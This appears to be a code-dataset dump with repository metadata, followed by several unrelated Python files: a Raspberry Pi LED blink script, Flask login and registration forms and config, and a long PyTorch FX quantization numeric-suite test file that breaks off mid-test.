hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1ff1702bcb8da359b79def16dce5a4619ac6195a | 512 | py | Python | projects/blink1led/blink1led.py | johnnymast/Raspberry-pi-3B | 9bde1a17d07159a2773c1c23ec9cb30079a74105 | [
"MIT"
] | 1 | 2017-01-18T00:03:38.000Z | 2017-01-18T00:03:38.000Z | projects/blink1led/blink1led.py | johnnymast/Raspberry-pi-3B | 9bde1a17d07159a2773c1c23ec9cb30079a74105 | [
"MIT"
] | null | null | null | projects/blink1led/blink1led.py | johnnymast/Raspberry-pi-3B | 9bde1a17d07159a2773c1c23ec9cb30079a74105 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import RPi.GPIO as GPIO
import time
# Set board mode this means real counting the pins
GPIO.setmode(GPIO.BOARD)
GPIO.cleanup()
# Set pin 7 to accept output
GPIO.setup(7,GPIO.OUT)
try:
while(1):
# Set pin 7 to HIGH this means power will flow
GPIO.output(7, GPIO.HIGH)
# Wait 1 second
time.sleep(0.5)
# Set pin to low meaning power off
GPIO.output(7, GPIO.LOW)
# Wait 1 second
time.sleep(0.5)
finally:
GPIO.cleanup()
| 18.285714 | 54 | 0.623047 |
87b615227acaacf27616211adb07c396afcd74d4 | 2,438 | py | Python | Flask/Blog/user/forms.py | LieonShelly/PythonFun | 811760d368885109f9359c2663d8ce74886f6ad6 | [
"MIT"
] | null | null | null | Flask/Blog/user/forms.py | LieonShelly/PythonFun | 811760d368885109f9359c2663d8ce74886f6ad6 | [
"MIT"
] | null | null | null | Flask/Blog/user/forms.py | LieonShelly/PythonFun | 811760d368885109f9359c2663d8ce74886f6ad6 | [
"MIT"
] | null | null | null |
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, BooleanField
from wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError
from flask_login import current_user
from Blog.user.models import User
from flask_wtf.file import FileAllowed, FileField
class RegistrationForm(FlaskForm):
username = StringField('Username', validators=[DataRequired(), Length(min=2, max=20)])
email = StringField("Email", validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password', validators=[DataRequired(), EqualTo('password')])
submit = SubmitField('Sign Up')
def validate_username(self, username):
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('That username is taken. Please choose a different one.')
def validate_email(self, email):
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('That email is taken. Please choose a different one.')
class LoginForm(FlaskForm):
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
remember = BooleanField('Remember Me')
submit = SubmitField('Login')
class UpdateAccountForm(FlaskForm):
username = StringField('Username', validators=[DataRequired(), Length(min=2, max=20)])
email = StringField('Email', validators=[DataRequired(), Email()])
picture = FileField('Update Profile Picture', validators=[FileAllowed(['jpg', 'png'])])
submit = SubmitField('Update')
class RequestResetForm(FlaskForm):
email = StringField('Email',
validators=[DataRequired(), Email()])
submit = SubmitField('Request Password Reset')
def validate_email(self, email):
user = User.query.filter_by(email=email.data).first()
if user is None:
raise ValidationError('There is no account with that email. You must register first.')
class ResetPasswordForm(FlaskForm):
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password',
validators=[DataRequired(), EqualTo('password')])
submit = SubmitField('Reset Password') | 44.327273 | 106 | 0.700164 |
f6fb5e91e68299b262be21f17347d7212104a56d | 1,140 | py | Python | config.py | jonathankamau/MovieBuff-API | 9ede6625b65f362b154aad0b3f525207aac77cdd | [
"MIT"
] | 1 | 2018-09-14T03:44:55.000Z | 2018-09-14T03:44:55.000Z | config.py | jonathankamau/MovieBuff-API | 9ede6625b65f362b154aad0b3f525207aac77cdd | [
"MIT"
] | 55 | 2020-06-03T02:48:43.000Z | 2021-07-22T02:45:54.000Z | config.py | jonathankamau/MovieBuff-API | 9ede6625b65f362b154aad0b3f525207aac77cdd | [
"MIT"
] | 1 | 2018-12-17T16:30:09.000Z | 2018-12-17T16:30:09.000Z | """App environment configurations."""
import os
from dotenv import load_dotenv
dotenv_path = os.path.join(os.path.dirname(__file__), '.env')
load_dotenv(dotenv_path)
class Development():
"""Model Development enviroment config object."""
DEBUG = True
DEVELOPMENT = True
SQLALCHEMY_DATABASE_URI = os.environ.get('LOCAL_DATABASE')
SQLALCHEMY_TRACK_MODIFICATIONS = True
class Testing():
"""Model Testing environment config object."""
DEBUG = True
TESTING = True
SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE')
SQLALCHEMY_TRACK_MODIFICATIONS = True
class Staging():
"""Model Development enviroment config object."""
DEBUG = True
STAGING = True
SQLALCHEMY_DATABASE_URI = os.environ.get('STAGING_DATABASE')
SQLALCHEMY_TRACK_MODIFICATIONS = True
class Production():
"""Model Development enviroment config object."""
DEBUG = True
PRODUCTION = True
SQLALCHEMY_DATABASE_URI = os.environ.get('PRODUCTION_DATABASE')
env_configuration = {
'development': Development,
'testing': Testing,
'staging': Staging,
'production': Production
}
| 21.509434 | 67 | 0.712281 |
5e67c3d44eaa957f5224995cba079b36392ebbce | 23 | py | Python | pandora-ckz/pandora/infinite/models.py | williamlagos/django-coding | 246dc1aba32eae0b035c407de3e8fe954606b776 | [
"MIT"
] | 4 | 2015-06-30T11:24:14.000Z | 2018-06-03T05:32:18.000Z | smartagent/models.py | jamespacileo/django-smartagent | 568a8843744b138199f72c14b68ed2f1ec841571 | [
"MIT"
] | 21 | 2020-03-24T18:18:22.000Z | 2021-03-31T20:18:53.000Z | smartagent/models.py | jamespacileo/django-smartagent | 568a8843744b138199f72c14b68ed2f1ec841571 | [
"MIT"
] | null | null | null | __author__ = 'James'
| 11.5 | 20 | 0.652174 |
a4651bb7c77dd2a3c977d670c9a4ebd693658104 | 81,013 | py | Python | test/quantization/fx/test_numeric_suite_fx.py | gardenia22/pytorch | deb6989880d8a62bb45ce6c6b058bb5d2e28cf91 | [
"Intel"
] | 60,067 | 2017-01-18T17:21:31.000Z | 2022-03-31T21:37:45.000Z | test/quantization/fx/test_numeric_suite_fx.py | Jam3/pytorch | 33d8769c285b51922c378d11a90a442a28e06762 | [
"Intel"
] | 66,955 | 2017-01-18T17:21:38.000Z | 2022-03-31T23:56:11.000Z | test/quantization/fx/test_numeric_suite_fx.py | Jam3/pytorch | 33d8769c285b51922c378d11a90a442a28e06762 | [
"Intel"
] | 19,210 | 2017-01-18T17:45:04.000Z | 2022-03-31T23:51:56.000Z | import copy
import math
import operator
import unittest
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.ao.quantization import default_dynamic_qconfig
import torch.nn.quantized as nnq
toq = torch.ops.quantized
from torch.ao.quantization.quantize_fx import (
convert_fx,
prepare_fx,
prepare_qat_fx,
)
from torch.testing._internal.common_quantization import (
ConvBnModel,
ConvBnReLUModel,
ConvModel,
QuantizationTestCase,
skipIfNoFBGEMM,
SingleLayerLinearDynamicModel,
SingleLayerLinearModel,
LSTMwithHiddenDynamicModel,
SparseNNModel,
skip_if_no_torchvision,
)
from torch.ao.quantization.quantization_mappings import (
get_default_static_quant_module_mappings,
get_default_dynamic_quant_module_mappings,
get_default_float_to_quantized_operator_mappings,
)
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_quantization import NodeSpec as ns
from torch.ao.quantization.fx.pattern_utils import get_default_quant_patterns
import torch.ao.quantization.fx.quantization_patterns as qp
from torch.ao.ns.fx.pattern_utils import (
get_type_a_related_to_b,
)
from torch.ao.ns.fx.graph_matcher import (
get_matching_subgraph_pairs,
GraphMatchingException,
)
from torch.ao.ns.fx.utils import (
compute_sqnr,
compute_normalized_l2_error,
compute_cosine_similarity,
)
from torch.ao.ns.fx.mappings import (
get_node_type_to_io_type_map,
get_unmatchable_types_map,
get_base_name_to_sets_of_related_ops,
get_base_name_for_op,
add_op_to_sets_of_related_ops,
)
from torch.ao.ns.fx.weight_utils import (
get_op_to_type_to_weight_extraction_fn,
)
from torch.ao.ns._numeric_suite_fx import (
extract_weights,
_extract_weights_impl,
add_loggers,
_add_loggers_impl,
OutputLogger,
add_shadow_loggers,
_add_shadow_loggers_impl,
extract_logger_info,
extract_shadow_logger_info,
extend_logger_results_with_comparison,
)
# Note: these models are not for use outside of this file. While it's good
# to reuse code, we also need to be able to iterate on tests
# quickly when debugging. If a test model has a large number of callsites
# across various different files, speed of debugging on individual test cases
# decreases.
class LinearReluFunctional(nn.Module):
def __init__(self):
super().__init__()
self.w1 = nn.Parameter(torch.empty(4, 4))
self.b1 = nn.Parameter(torch.zeros(4))
torch.nn.init.kaiming_uniform_(self.w1, a=math.sqrt(5))
def forward(self, x):
x = F.linear(x, self.w1, self.b1)
x = F.relu(x)
return x
class LinearFunctional(nn.Module):
def __init__(self):
super().__init__()
self.w1 = nn.Parameter(torch.empty(4, 4))
self.b1 = nn.Parameter(torch.zeros(4))
torch.nn.init.kaiming_uniform_(self.w1, a=math.sqrt(5))
def forward(self, x):
x = F.linear(x, self.w1, self.b1)
return x
class LinearReluLinearFunctional(nn.Module):
def __init__(self):
super().__init__()
self.w = nn.Parameter(torch.Tensor(4, 4))
self.b = nn.Parameter(torch.zeros(4))
torch.nn.init.kaiming_uniform_(self.w, a=math.sqrt(5))
def forward(self, x):
x = F.linear(x, self.w, self.b)
x = F.relu(x)
x = F.linear(x, self.w, self.b)
return x
class AddMulFunctional(nn.Module):
def forward(self, x, y):
x = x + 1.0
x = x * 1.0
x = 1.0 + x
x = 1.0 * x
x = x + y
x = x * y
return x
class AllConvAndLinearFusionModules(torch.nn.Module):
def __init__(self):
super().__init__()
# conv1d
self.conv1d_0 = nn.Conv1d(1, 1, 1)
# conv1d - relu
self.conv1d_1 = nn.Conv1d(1, 1, 1)
self.relu_0 = nn.ReLU()
# conv1d - bn (qat only)
self.conv1d_2 = nn.Conv1d(1, 1, 1)
self.bn1d_0 = nn.BatchNorm1d(1)
# conv1d - bn - relu (qat only)
self.conv1d_3 = nn.Conv1d(1, 1, 1)
self.bn1d_1 = nn.BatchNorm1d(1)
self.relu_4 = nn.ReLU()
# conv2d
self.conv2d_0 = nn.Conv2d(1, 1, 1)
# conv2d - relu
self.conv2d_1 = nn.Conv2d(1, 1, 1)
self.relu_1 = nn.ReLU()
# conv2d - bn (qat only)
self.conv2d_2 = nn.Conv2d(1, 1, 1)
self.bn2d_0 = nn.BatchNorm2d(1)
# conv2d - bn - relu (qat only)
self.conv2d_3 = nn.Conv2d(1, 1, 1)
self.bn2d_1 = nn.BatchNorm2d(1)
self.relu_5 = nn.ReLU()
# conv3d
self.conv3d_0 = nn.Conv3d(1, 1, 1)
# conv3d - relu
self.conv3d_1 = nn.Conv3d(1, 1, 1)
self.relu_2 = nn.ReLU()
# conv3d - bn (qat only)
self.conv3d_2 = nn.Conv3d(1, 1, 1)
self.bn3d_0 = nn.BatchNorm3d(1)
# conv3d - bn - relu (qat only)
self.conv3d_3 = nn.Conv3d(1, 1, 1)
self.bn3d_1 = nn.BatchNorm3d(1)
self.relu_6 = nn.ReLU()
# linear
self.linear_0 = nn.Linear(1, 1)
# linear - relu
self.linear_1 = nn.Linear(1, 1)
self.relu_3 = nn.ReLU()
def forward(self, x):
# conv1d
x = self.conv1d_0(x)
x = self.conv1d_1(x)
x = self.relu_0(x)
x = self.conv1d_2(x)
x = self.bn1d_0(x)
x = self.conv1d_3(x)
x = self.bn1d_1(x)
x = self.relu_4(x)
# conv2d
x = x.reshape(1, 1, 1, 1)
x = self.conv2d_0(x)
x = self.conv2d_1(x)
x = self.relu_1(x)
x = self.conv2d_2(x)
x = self.bn2d_0(x)
x = self.conv2d_3(x)
x = self.bn2d_1(x)
x = self.relu_5(x)
# conv3d
x = x.reshape(1, 1, 1, 1, 1)
x = self.conv3d_0(x)
x = self.conv3d_1(x)
x = self.relu_2(x)
x = self.conv3d_2(x)
x = self.bn3d_0(x)
x = self.conv3d_3(x)
x = self.bn3d_1(x)
x = self.relu_6(x)
# linear
x = x.reshape(1, 1)
x = self.linear_0(x)
x = self.linear_1(x)
x = self.relu_3(x)
return x
class AllConvFunctional(torch.nn.Module):
def __init__(self, weight1d, weight2d, weight3d, bias1d, bias2d, bias3d):
super().__init__()
self.weight1d = torch.nn.Parameter(weight1d)
self.weight2d = torch.nn.Parameter(weight2d)
self.weight3d = torch.nn.Parameter(weight3d)
self.bias1d = torch.nn.Parameter(bias1d)
self.bias2d = torch.nn.Parameter(bias2d)
self.bias3d = torch.nn.Parameter(bias3d)
self.stride1d = 1
self.padding1d = 0
self.dilation1d = 1
self.stride2d = (1, 1)
self.padding2d = (0, 0)
self.dilation2d = (1, 1)
self.groups = 1
self.stride3d = (1, 1, 1)
self.padding3d = (0, 0, 0)
self.dilation3d = (1, 1, 1)
def forward(self, x):
x = F.conv1d(
x, self.weight1d, self.bias1d, self.stride1d, self.padding1d,
self.dilation1d, self.groups)
x = F.conv1d(
x, self.weight1d, self.bias1d, self.stride1d, self.padding1d,
self.dilation1d, self.groups)
x = F.relu(x)
x = F.conv2d(
x, self.weight2d, self.bias2d, self.stride2d, self.padding2d,
self.dilation2d, self.groups)
x = F.conv2d(
x, self.weight2d, self.bias2d, self.stride2d, self.padding2d,
self.dilation2d, self.groups)
x = F.relu(x)
x = F.conv3d(
x, self.weight3d, self.bias3d, self.stride3d, self.padding3d,
self.dilation3d, self.groups)
x = F.conv3d(
x, self.weight3d, self.bias3d, self.stride3d, self.padding3d,
self.dilation3d, self.groups)
x = F.relu(x)
return x
@torch.fx.wrap
def _wrapped_hardswish(x):
return F.hardswish(x)
@torch.fx.wrap
def _wrapped_hardswish_fp16(x):
x = x.dequantize()
x = F.hardswish(x)
x = x.to(torch.float16)
return x
@torch.fx.wrap
def _wrapped_sigmoid(x):
return F.sigmoid(x)
@torch.fx.wrap
def _wrapped_linear(x, w, b):
return F.linear(x, w, b)
class TestFXGraphMatcher(QuantizationTestCase):
@skipIfNoFBGEMM
def test_simple_mod(self):
m = nn.Sequential(nn.Conv2d(1, 1, 1)).eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
conv_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, nn.Conv2d) + '_0'
expected_types = {
conv_name_0: ((nn.Conv2d, torch.ao.quantization.MinMaxObserver), (nnq.Conv2d, nnq.Conv2d)),
}
self.assert_types_for_matched_subgraph_pairs(results, expected_types, mp, mq)
@skipIfNoFBGEMM
def test_simple_fun(self):
class M(nn.Module):
def __init__(self):
super().__init__()
self.w = nn.Parameter(torch.empty(1, 4))
self.b = nn.Parameter(torch.zeros(1))
torch.nn.init.kaiming_uniform_(self.w, a=math.sqrt(5))
def forward(self, x):
return F.linear(x, self.w, self.b)
m = M().eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
linear_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, F.linear) + '_0'
expected_types = {
linear_name_0:
((F.linear, torch.ao.quantization.MinMaxObserver), (toq.linear, toq.linear))
}
self.assert_types_for_matched_subgraph_pairs(results, expected_types, mp, mq)
@skipIfNoFBGEMM
def test_simple_fusion(self):
m = LinearReluFunctional().eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
linear_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, F.linear) + '_0'
expected_types = {
linear_name_0:
((F.linear, torch.ao.quantization.MinMaxObserver), (toq.linear_relu, toq.linear_relu)),
}
self.assert_types_for_matched_subgraph_pairs(results, expected_types, mp, mq)
@skipIfNoFBGEMM
def test_simple_mod_multi(self):
m = nn.Sequential(
nn.Sequential(
nn.Conv2d(1, 1, 1),
),
nn.Conv2d(1, 1, 1),
).eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
# assume success if no exceptions
results = get_matching_subgraph_pairs(mp, mq)
@skipIfNoFBGEMM
def test_simple_tensor_ops(self):
class M(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
z = x + y
return z
m = M().eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
# assume success if no exceptions
results = get_matching_subgraph_pairs(mp, mq)
@skipIfNoFBGEMM
def test_matching_failure_node_count(self):
# verify that matching graphs with matching node types but
# different counts of matchable nodes fails
m1 = nn.Sequential(nn.Conv2d(1, 1, 1)).eval()
m2 = nn.Sequential(nn.Conv2d(1, 1, 1), nn.Conv2d(1, 1, 1)).eval()
mp1 = prepare_fx(m1, {'': torch.ao.quantization.default_qconfig})
mp2 = prepare_fx(m2, {'': torch.ao.quantization.default_qconfig})
with self.assertRaises(GraphMatchingException) as ex:
results = get_matching_subgraph_pairs(mp1, mp2)
@skipIfNoFBGEMM
def test_matching_failure_node_type(self):
# verify that matching graphs with non-matching node types fails
m1 = nn.Sequential(nn.Conv2d(1, 1, 1)).eval()
m2 = nn.Sequential(nn.Linear(1, 1)).eval()
mp1 = prepare_fx(m1, {'': torch.ao.quantization.default_qconfig})
mp2 = prepare_fx(m2, {'': torch.ao.quantization.default_qconfig})
with self.assertRaises(GraphMatchingException) as ex:
results = get_matching_subgraph_pairs(mp1, mp2)
@skipIfNoFBGEMM
def test_nodes_before_cat(self):
# verify that nodes before cat get matched
class M(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x0):
x1 = torch.add(x0, 1.0)
y1 = torch.add(x0, 1.0)
x2 = torch.cat([x1, y1])
return x2
m = M().eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
cat_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.cat) + '_0'
add_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.add) + '_0'
add_name_1 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.add) + '_1'
expected_types = {
cat_name_0: ((torch.cat, torch.cat), (torch.cat, torch.cat)),
add_name_0: ((torch.add, torch.ao.quantization.MinMaxObserver), (toq.add, toq.add)),
add_name_1: ((torch.add, torch.ao.quantization.MinMaxObserver), (toq.add, toq.add)),
}
self.assert_types_for_matched_subgraph_pairs(results, expected_types, mp, mq)
@skipIfNoFBGEMM
def test_dict_return_type(self):
# verify that we can traverse up nodes which return dictionaries
class M(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x0):
x1 = torch.add(x0, 1.0)
y1 = torch.add(x0, 1.0)
z1 = torch.add(x0, 1.0)
a1 = {'x1': x1, 'y1': (y1,), 'z1': [{'key': (z1,)}]}
return a1
m = M().eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
add_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.add) + '_0'
add_name_1 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.add) + '_1'
add_name_2 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.add) + '_2'
expected_types = {
add_name_0: ((torch.add, torch.ao.quantization.MinMaxObserver), (toq.add, toq.add)),
add_name_1: ((torch.add, torch.ao.quantization.MinMaxObserver), (toq.add, toq.add)),
add_name_2: ((torch.add, torch.ao.quantization.MinMaxObserver), (toq.add, toq.add)),
}
self.assert_types_for_matched_subgraph_pairs(results, expected_types, mp, mq)
@skipIfNoFBGEMM
@unittest.skip("Broken by https://github.com/pytorch/pytorch/pull/62608, need dtype inference support")
def test_nodes_with_equal_types_get_matched(self):
class M(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 1, 1)
self.conv2 = nn.Conv2d(1, 1, 1)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x = torch.mul(x, x)
x = torch.sigmoid(x)
x = F.relu(x)
return x
m = M().eval()
# prevent conv2 from getting quantized, so we can test
# modules with equal types
qconfig_dict = {
'': torch.ao.quantization.default_qconfig,
'module_name': [('conv2', None)],
}
mp = prepare_fx(m, qconfig_dict)
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
conv_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, nn.Conv2d) + '_0'
conv_name_1 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, nn.Conv2d) + '_1'
mul_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.mul) + '_0'
relu_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.relu) + '_0'
sigmoid_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.sigmoid) + '_0'
# all of these should be matched
expected_types = {
conv_name_1:
((nn.Conv2d, torch.ao.quantization.MinMaxObserver), (nnq.Conv2d, nnq.Conv2d)),
conv_name_0:
((nn.Conv2d, torch.ao.quantization.MinMaxObserver), (nn.Conv2d, nn.Conv2d)),
mul_name_0: ((torch.mul, torch.ao.quantization.MinMaxObserver), (toq.mul, toq.mul)),
relu_name_0: ((F.relu, torch.ao.quantization.MinMaxObserver), (F.relu, F.relu)),
sigmoid_name_0:
((torch.sigmoid, torch.sigmoid), (torch.sigmoid, torch.sigmoid)),
}
self.assert_types_for_matched_subgraph_pairs(results, expected_types, mp, mq)
@unittest.skip("Broken by https://github.com/pytorch/pytorch/pull/62608, need dtype inference support")
def test_methods(self):
"""
Verify that graph matching works on methods
"""
class M(nn.Module):
def forward(self, x):
x = x.sigmoid()
return x
m1 = M().eval()
m2 = M().eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
m1p = prepare_fx(m1, qconfig_dict)
m2p = prepare_fx(m2, qconfig_dict)
results = get_matching_subgraph_pairs(m1p, m2p)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
sigmoid_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, torch.sigmoid) + '_0'
expected_types = {
sigmoid_name_0:
(('sigmoid', 'sigmoid'), ('sigmoid', 'sigmoid')),
}
self.assert_types_for_matched_subgraph_pairs(
results, expected_types, m1p, m2p)
def test_op_relationship_mapping(self):
"""
Tests that the mapping of op relationships is complete.
"""
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
type_a_related_to_b = \
get_type_a_related_to_b(base_name_to_sets_of_related_ops)
# 1. check static quant module mappings
static_quant_mod_mappings = get_default_static_quant_module_mappings()
for fp32_type, int8_type in static_quant_mod_mappings.items():
# skip quants and dequants, for the purposes of Numerical Suite
types_to_skip = (
torch.ao.quantization.QuantStub,
torch.ao.quantization.DeQuantStub,
nnq.FloatFunctional,
)
if fp32_type in types_to_skip:
continue
# verify relatedness
in_type_a_related_to_b = \
(fp32_type, int8_type) in type_a_related_to_b
self.assertTrue(
in_type_a_related_to_b,
f"{fp32_type} and {int8_type} need a relationship mapping")
# 2. check static quant op mappings
static_quant_fun_mappings = get_default_float_to_quantized_operator_mappings()
for fp32_type, int8_type in static_quant_fun_mappings.items():
# verify relatedness
in_type_a_related_to_b = \
(fp32_type, int8_type) in type_a_related_to_b
self.assertTrue(
in_type_a_related_to_b,
f"{fp32_type} and {int8_type} need a relationship mapping")
# 3. check dynamic quant mappings
dynamic_quant_mappings = get_default_dynamic_quant_module_mappings()
for fp32_type, int8_type in dynamic_quant_mappings.items():
# TODO(future PR): enable correct weight extraction for these
# and remove from this list.
types_to_skip = (
nn.GRUCell,
nn.GRU,
nn.LSTMCell,
nn.RNNCell,
)
if fp32_type in types_to_skip:
continue
# verify relatedness
in_type_a_related_to_b = \
(fp32_type, int8_type) in type_a_related_to_b
self.assertTrue(
in_type_a_related_to_b,
f"{fp32_type} and {int8_type} need a relationship mapping")
# 4. go through the ops mapped to each QuantizeHandler type, and verify
# correctness.
def _op_in_base_sets_of_related_ops(op):
for name, ops in base_name_to_sets_of_related_ops.items():
if op in ops:
return True
return False
unmatchable_types_map = get_unmatchable_types_map()
FUNS_UNMATCHABLE = unmatchable_types_map['funs_unmatchable']
MODS_UNMATCHABLE = unmatchable_types_map['mods_unmatchable']
METHS_UNMATCHABLE = unmatchable_types_map['meths_unmatchable']
def _op_is_unmatchable(op):
return (
op in FUNS_UNMATCHABLE or
op in MODS_UNMATCHABLE or
op in METHS_UNMATCHABLE
)
default_quant_patterns = get_default_quant_patterns()
for pattern, qhandler_cls in default_quant_patterns.items():
base_op = None
if isinstance(pattern, tuple):
base_op = pattern[-1]
elif isinstance(pattern, str):
base_op = pattern
else:
base_op = pattern
qhandler_cls_all_ops_quantizeable = [
qp.CatQuantizeHandler,
qp.ConvReluQuantizeHandler,
qp.LinearReLUQuantizeHandler,
qp.BatchNormQuantizeHandler,
qp.EmbeddingQuantizeHandler,
qp.RNNDynamicQuantizeHandler,
]
qhandler_cls_quant_op_same_signature = [
qp.FixedQParamsOpQuantizeHandler,
qp.CopyNodeQuantizeHandler,
qp.GeneralTensorShapeOpQuantizeHandler,
]
if qhandler_cls == qp.BinaryOpQuantizeHandler:
# these ops do not have quantized equivalents
ops_to_skip = [
torch.bmm,
torch.div,
torch.sub,
operator.truediv,
operator.sub
]
if base_op in ops_to_skip:
continue
self.assertTrue(
_op_in_base_sets_of_related_ops(base_op),
f"{base_op} not in sets of related ops")
elif qhandler_cls == qp.RNNDynamicQuantizeHandler:
# TODO(future PR): add support for all classes in
# RNNDynamicQuantizeHandler
pass
elif qhandler_cls == qp.DefaultNodeQuantizeHandler:
# torch.sum does not have quantized equivalents
if base_op == torch.sum:
continue
self.assertTrue(
_op_in_base_sets_of_related_ops(base_op),
f"{base_op} not in sets of related ops")
elif qhandler_cls in qhandler_cls_quant_op_same_signature:
# these ops use the same op signature for fp32 and quantized
# tensors
self.assertTrue(
_op_in_base_sets_of_related_ops(base_op) or
_op_is_unmatchable(base_op),
f"{base_op} not in sets of related ops or unmatchable")
elif qhandler_cls in qhandler_cls_all_ops_quantizeable:
self.assertTrue(
_op_in_base_sets_of_related_ops(base_op),
f"{base_op} not in sets of related ops")
else:
raise AssertionError(
f"handing for {qhandler_cls} not implemented")
@skipIfNoFBGEMM
def test_user_defined_function(self):
"""
Verify that graph matching works on user defined functions
"""
class M1(nn.Module):
def forward(self, x):
x = F.hardswish(x)
return x
class M2(nn.Module):
def forward(self, x):
x = _wrapped_hardswish(x)
return x
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
m1 = prepare_fx(M1().eval(), qconfig_dict)
m2 = prepare_fx(M2().eval(), qconfig_dict)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
add_op_to_sets_of_related_ops(
base_name_to_sets_of_related_ops, _wrapped_hardswish, F.hardswish)
results = get_matching_subgraph_pairs(
m1, m2,
base_name_to_sets_of_related_ops=base_name_to_sets_of_related_ops)
hardswish_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, F.hardswish) + '_0'
expected_types = {
hardswish_name_0:
((F.hardswish, torch.ao.quantization.MinMaxObserver), (_wrapped_hardswish, _wrapped_hardswish)),
}
self.assert_types_for_matched_subgraph_pairs(
results, expected_types, m1, m2)
@skipIfNoFBGEMM
def test_results_order(self):
m = nn.Sequential(
nn.Conv2d(1, 1, 1),
nn.Linear(1, 1),
).eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
